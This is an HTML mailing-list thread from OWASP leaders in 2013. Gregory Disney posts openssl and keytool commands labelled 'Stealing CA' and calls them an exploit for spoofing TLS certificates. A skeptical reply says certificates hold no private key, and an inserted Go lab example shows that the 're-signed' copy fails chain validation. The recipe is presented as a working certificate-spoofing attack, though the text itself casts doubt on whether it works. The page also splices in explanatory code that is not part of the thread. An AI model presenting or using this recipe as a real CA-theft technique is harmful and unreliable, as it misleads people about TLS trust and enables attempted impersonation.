<html>
  <head>
    <meta content="text/html; charset=windows-1252"
      http-equiv="Content-Type">
  </head>
  <body bgcolor="#FFFFFF" text="#000000">
    openssl s_client -showcerts -connect $host:$port > $keyring.pem;<br>
    openssl x509 -in $keyring.pem -pubkey > $keyring.cer;<br>
    keytool -keystore $ks --importcert --alias $keyring.pem -file $keyring.pem -storepass $passwd -noprompt;<br>
    keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass $passwd -noprompt<br>
    keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 -storepass $passwd -noprompt<br>
    openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd<br>
    echo "Stealing CA"<br>
    cat $keyring.key >> $keyring.pem<br>
    openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey $keyring.key -CA $keyring.key -CAcreateserial<br>
    <br>
    This is exactly how I do it. They are checking for the public key and
    private key; I'm not sure why openssl lets you resign as a key. But
    here is the source for the exploit. <br>
    <br>
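    What the recipe above actually produces, and how a TLS client treats it, as an added Go example written for this page (it is not Gregory's gist or any project's code; it uses Go's standard crypto/x509 with Ed25519 keys for brevity): a made-up lab CA issues a leaf, then the leaf is re-created with a fresh key pair and itself as issuer, which is the only "re-sign" available when the fetched PEM holds no CA private key. All names and keys are constructed.

```go
package main
import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"math/big"
	"time"
)

// issue signs tmpl for public key pub with the signer's key; parent names the issuer (lab helper).
func issue(tmpl, parent *x509.Certificate, pub interface{}, signer ed25519.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil { panic(err) }
	c, _ := x509.ParseCertificate(der) // DER produced just above always parses
	return c
}

// BuildFixtures makes a made-up lab CA, a leaf it issued, and a "re-signed" copy of that leaf with the
// same subject and SAN but a new key pair and itself as issuer (the CA key is never in the fetched PEM).
func BuildFixtures() (ca, leaf, spoof *x509.Certificate) {
	_, caKey, _ := ed25519.GenerateKey(rand.Reader) // key-gen errors ignored in this lab fixture
	_, leafKey, _ := ed25519.GenerateKey(rand.Reader)
	_, attackerKey, _ := ed25519.GenerateKey(rand.Reader)
	now := time.Now().Add(-time.Minute)
	caTmpl := &x509.Certificate{SerialNumber: big.NewInt(1), IsCA: true, BasicConstraintsValid: true,
		Subject: pkix.Name{CommonName: "Lab Root CA"}, KeyUsage: x509.KeyUsageCertSign,
		NotBefore: now, NotAfter: now.Add(time.Hour)}
	ca = issue(caTmpl, caTmpl, caKey.Public(), caKey)
	leafTmpl := &x509.Certificate{SerialNumber: big.NewInt(2), DNSNames: []string{"www.example.test"},
		Subject: pkix.Name{CommonName: "www.example.test"}, NotBefore: now, NotAfter: now.Add(time.Hour),
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}}
	leaf = issue(leafTmpl, ca, leafKey.Public(), caKey)
	spoof = issue(leafTmpl, leafTmpl, attackerKey.Public(), attackerKey) // self-issued copy
	return ca, leaf, spoof
}

// ChainsToRoot is the TLS-client check: does the signature chain to a trusted root for host?
func ChainsToRoot(c, root *x509.Certificate, host string) bool {
	pool := x509.NewCertPool()
	pool.AddCert(root)
	_, err := c.Verify(x509.VerifyOptions{Roots: pool, DNSName: host})
	return err == nil
}

// SameKey reports whether two certificates carry the same subject public key.
func SameKey(a, b *x509.Certificate) bool {
	return bytes.Equal(a.RawSubjectPublicKeyInfo, b.RawSubjectPublicKeyInfo)
}
```

The copy keeps the original subject and SAN but fails chain validation against the real root and carries a different public key, which is exactly what a client checks.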
    <div class="moz-cite-prefix">On 12/26/13, 11:35 AM, Abbas Naderi
      wrote:<br>
    </div>
    <blockquote
      cite="mid:119ECE03-9C58-48F2-8E79-040B31C1FC2F@owasp.org"
      type="cite">
      <meta http-equiv="Content-Type" content="text/html;
        charset=windows-1252">
      I didn’t quite understand. What does the encoding vulnerability
      expose? SSL certs are public keys plus a bunch of other data.
      There is no private key inside to extract and resign another
      certificate with.
      <div>-A<br>
        <div>
          <div>On Dec 26, 2013, at 2:32 PM, Gregory Disney <<a
              moz-do-not-send="true"
              href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>
            wrote:</div>
          <br class="Apple-interchange-newline">
          <blockquote type="cite">
            <meta content="text/html; charset=windows-1252"
              http-equiv="Content-Type">
            <div bgcolor="#FFFFFF" text="#000000"> I think a fair
              description would be that it simplifies spoofing certs. This
              started out as a proof of concept a year ago when I
              realized there was a vulnerability in PEM encoding of SSL
              certs, so I chain-loaded a Java key store which was
              converted to a key, then resigned the cert with the
              chain-loaded key, thus keeping the context of the original
              certificate with a hijacked authority. <br>
              <div class="moz-cite-prefix">On 12/26/13, 11:21 AM, Abbas
                Naderi wrote:<br>
              </div>
              <blockquote
                cite="mid:1B556592-055F-4E5F-A9CF-13354D8F2946@owasp.org"
                type="cite">
                <meta http-equiv="Content-Type" content="text/html;
                  charset=windows-1252">
                Well a description of what this does would be a good
                idea to start with…
                <div>-A<br>
                  <div style="">
                    <div>On Dec 26, 2013, at 2:18 PM, Gregory Disney
                      <<a moz-do-not-send="true"
                        href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>

                      wrote:</div>
                    <br class="Apple-interchange-newline">
                    <blockquote type="cite">
                      <meta content="text/html; charset=windows-1252"
                        http-equiv="Content-Type">
                      <div bgcolor="#FFFFFF" text="#000000"> I'm working
                        on the documentation. It works by turning a
                        keytool pk12 into an openssl key, then embedding the
                        key in the root CA and resigning with the
                        embedded key.<br>
                        <div class="moz-cite-prefix">On 12/26/13, 10:47
                          AM, Dinis Cruz wrote:<br>
                        </div>
                        <blockquote
cite="mid:CA+f=kXDpB+4WH_ypbm79BMhucdQNCx_bVAQo1U9PnQynLqyfhA@mail.gmail.com"
                          type="cite">
                          <meta http-equiv="Context-Type"
                            content="text/html; charset=ISO-8859-1">
                          <p dir="ltr">Hi Gregory, where can I find the
                            details of how this works?</p>
                          <p dir="ltr">Thx</p>
                          <p dir="ltr">Dinis</p>
                          <div class="gmail_quote">On 26 Dec 2013 07:44,
                            "Gregory Disney" <<a
                              moz-do-not-send="true"
                              href="mailto:gregory.disney@owasp.org">gregory.disney@owasp.org</a>>


                            wrote:<br type="attribution">
                            <blockquote class="gmail_quote"> Screen shot
                              of successfully spoofed certs:<br>
                              <a moz-do-not-send="true"
href="http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png"
                                target="_blank">http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png</a><br>
                              Each of these certs has been tested and is
                              capable of creating SSL sessions.<br>
                              Cert Stealer:<br>
                              <a moz-do-not-send="true"
                                href="https://gist.github.com/gdisneyleugers/8129304"
                                target="_blank">https://gist.github.com/gdisneyleugers/8129304</a><br>
                              -Greg<br>
_______________________________________________<br>
                              OWASP-Leaders mailing list<br>
                              <a moz-do-not-send="true"
                                href="mailto:OWASP-Leaders@lists.owasp.org"
                                target="_blank">OWASP-Leaders@lists.owasp.org</a><br>
                              <a moz-do-not-send="true"
                                href="https://lists.owasp.org/mailman/listinfo/owasp-leaders"
                                target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-leaders</a><br>
                            </blockquote>
                          </div>
                        </blockquote>
                        <br>
                      </div>
                    </blockquote>
                  </div>
                  <br>
                </div>
              </blockquote>
              <br>
            </div>
          </blockquote>
        </div>
        <br>
      </div>
    </blockquote>
    <br>
  </body>
</html>